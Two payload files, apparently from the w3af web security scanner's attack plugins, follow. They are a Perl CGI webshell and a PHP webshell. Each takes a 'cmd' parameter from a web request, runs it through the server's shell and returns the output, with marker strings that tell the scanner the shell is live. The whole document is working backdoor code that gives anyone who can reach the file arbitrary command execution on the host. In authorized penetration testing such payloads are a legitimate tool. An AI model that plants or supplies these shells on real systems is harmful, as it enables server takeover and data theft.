File: w3af/plugins/attack/payloads/webshell/webshell.pl
#!/usr/bin/perl

if (length ($ENV{'QUERY_STRING'}) > 0){
    $buffer = $ENV{'QUERY_STRING'};
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs){
        ($name, $value) = split(/=/, $pair);
        $value =~ s/\+/%20/g;
        $value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
        $in{$name} = $value; 
    }
}

print "Content-type: text/html\n\n";

if($in{'cmd'} ne "") {
    print `/bin/bash -c "$in{'cmd'}"`;
}
else
{
    print "15825b40c6dace2a" . "7cf5d4ab8ed434d5";
}

File: w3af/plugins/attack/payloads/webshell/webshell.php
<?php
echo strrev("15825b40c6dace2a");
if ( isset( $_REQUEST['cmd']) && $_REQUEST['cmd'] !== '' ){
 $ar = array(); $ou = "";
 exec($_REQUEST['cmd'], $ar);
 foreach ($ar as $k=>$v){$ou = $ou . "$v\n";}
 echo base64_encode($ou);
}
echo strrev("7cf5d4ab8ed434d5");
?>
